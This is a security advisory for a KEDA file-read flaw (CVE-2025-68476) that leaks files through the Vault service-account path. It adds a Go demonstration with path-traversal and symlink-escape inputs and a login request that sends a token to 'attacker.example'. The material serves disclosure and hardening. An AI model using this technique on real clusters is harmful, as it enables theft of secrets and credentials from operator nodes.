PT-2025-52724 · Keda · Keda

Jorge Turrado · Published 2025-12-22 · Updated 2026-01-08 · CVE-2025-68476

CVSS v4.0: 8.2 (High)
Vector: AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
Name of the Vulnerable Software and Affected Versions
KEDA versions prior to 2.17.3
KEDA 2.18.x prior to 2.18.3
Description
KEDA is a Kubernetes-based Event Driven Autoscaling component. A flaw in KEDA allows an attacker with permission to create or modify a TriggerAuthentication resource to read arbitrary files reachable by the KEDA operator process on the node where its pod runs, including anything mounted into that pod. The cause is insufficient path validation when loading the service account token named in spec.hashiCorpVault.credential.serviceAccount: the file is read as-is and its content is then sent as the JWT of the Vault Kubernetes-auth login request to the Vault address configured in the same resource. An attacker who points that address at a server they control therefore receives the file's content, which may be secrets, keys, or system files such as /etc/passwd. Any KEDA resource that uses a TriggerAuthentication with HashiCorp Vault authentication is affected.
Recommendations
Update KEDA to version 2.17.3 or later; on the 2.18 line, update to 2.18.3 or later. Until the upgrade is done, restrict RBAC create and update rights on TriggerAuthentication and ClusterTriggerAuthentication resources to trusted principals, and review existing resources whose spec.hashiCorpVault.credential.serviceAccount points anywhere other than the pod's projected service account token.
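The following Go example is added here; it is not code from this advisory or from the KEDA project. It places the unchecked file read the description refers to next to an illustrative hardened loader that confines the configured path to the projected token directory, both lexically and after symlink resolution, and shows how the loaded bytes end up in the Vault login request. All names (loadTokenUnchecked, loadTokenChecked, confine, vaultLoginRequest, defaultTokenDir), the demo directory layout and the fake token are this example's own assumptions; the hardened check is not claimed to be KEDA's actual fix. The login endpoint /v1/auth/kubernetes/login with a role/jwt JSON body is Vault's Kubernetes auth method.

```go
package main

import (
	"encoding/json"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// Default directory where Kubernetes projects a pod's service account token.
// The constant name is this example's own, not a KEDA identifier.
const defaultTokenDir = "/var/run/secrets/kubernetes.io/serviceaccount"

// loadTokenUnchecked mirrors the vulnerable pattern the advisory describes:
// the path from spec.hashiCorpVault.credential.serviceAccount is read as-is,
// so "/etc/passwd" or any other readable file is accepted as the "token".
func loadTokenUnchecked(path string) (string, error) {
	b, err := os.ReadFile(path)
	if err != nil {
		return "", err
	}
	return strings.TrimSpace(string(b)), nil
}

// confine returns the cleaned path if it lies inside allowedDir and an error
// otherwise. The check is lexical: filepath.Clean resolves ".." segments first,
// so "<dir>/../../etc/passwd" is rejected by the prefix comparison.
func confine(path, allowedDir string) (string, error) {
	if !filepath.IsAbs(path) {
		return "", fmt.Errorf("service account token path %q must be absolute", path)
	}
	clean := filepath.Clean(path)
	rel, err := filepath.Rel(filepath.Clean(allowedDir), clean)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", fmt.Errorf("service account token path %q is outside %s", path, allowedDir)
	}
	return clean, nil
}

// loadTokenChecked is an illustrative hardened loader (assumed, not KEDA's fix):
// it confines the path lexically, then again after resolving symlinks on both
// sides, so a link planted inside the directory cannot point out of it. The
// projected token is itself a symlink chain that stays inside the directory
// (token -> ..data/token -> ..<timestamp>/token), so it still passes.
func loadTokenChecked(path, allowedDir string) (string, error) {
	clean, err := confine(path, allowedDir)
	if err != nil {
		return "", err
	}
	realDir, err := filepath.EvalSymlinks(allowedDir)
	if err != nil {
		return "", err
	}
	realPath, err := filepath.EvalSymlinks(clean)
	if err != nil {
		return "", err
	}
	if _, err := confine(realPath, realDir); err != nil {
		return "", err
	}
	return loadTokenUnchecked(realPath)
}

// vaultLoginRequest shows why the read is an exfiltration: the loaded bytes are
// POSTed as the "jwt" field of Vault's Kubernetes-auth login to whatever
// address the TriggerAuthentication names, attacker-controlled or not.
func vaultLoginRequest(address, role, jwt string) (string, []byte, error) {
	body, err := json.Marshal(map[string]string{"role": role, "jwt": jwt})
	if err != nil {
		return "", nil, err
	}
	return strings.TrimRight(address, "/") + "/v1/auth/kubernetes/login", body, nil
}

func main() {
	// Constructed demo layout (not a real pod): a fake token directory holding a
	// token file and a symlink that escapes it, next to an "outside" file.
	root, err := os.MkdirTemp("", "sa-demo")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(root)
	tokenDir := filepath.Join(root, "serviceaccount")
	for _, e := range []error{
		os.MkdirAll(tokenDir, 0o700),
		os.WriteFile(filepath.Join(tokenDir, "token"), []byte("eyJ.fake.token\n"), 0o600),
		os.WriteFile(filepath.Join(root, "secret.txt"), []byte("outside"), 0o600),
		os.Symlink(filepath.Join(root, "secret.txt"), filepath.Join(tokenDir, "link")),
	} {
		if e != nil {
			panic(e)
		}
	}
	for _, p := range []string{
		filepath.Join(tokenDir, "token"), // legitimate projected token
		tokenDir + "/../secret.txt",      // path traversal
		filepath.Join(tokenDir, "link"),  // symlink escape
	} {
		unchecked, _ := loadTokenUnchecked(p)
		checked, err := loadTokenChecked(p, tokenDir)
		fmt.Printf("%s\n  unchecked: %q\n  checked:   %q err=%v\n", p, unchecked, checked, err)
	}
	url, body, _ := vaultLoginRequest("http://attacker.example", "keda", "eyJ.fake.token")
	fmt.Printf("POST %s %s\n", url, body)
}
```

In a real deployment defaultTokenDir would be passed as allowedDir; the demo uses a temporary directory so it runs anywhere. The lexical check alone is not enough, which is why loadTokenChecked re-runs confine on the resolved paths: without that second pass, a symlink inside the permitted directory would still reach any file the operator can read.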

Weakness Enumeration

Incorrect Authorization
Path traversal

Related Identifiers

AZL-72868
CVE-2025-68476
GHSA-C4P6-QG4M-9JMR
GO-2025-4257
SUSE-SU-2026:0037-1

Affected Products

Keda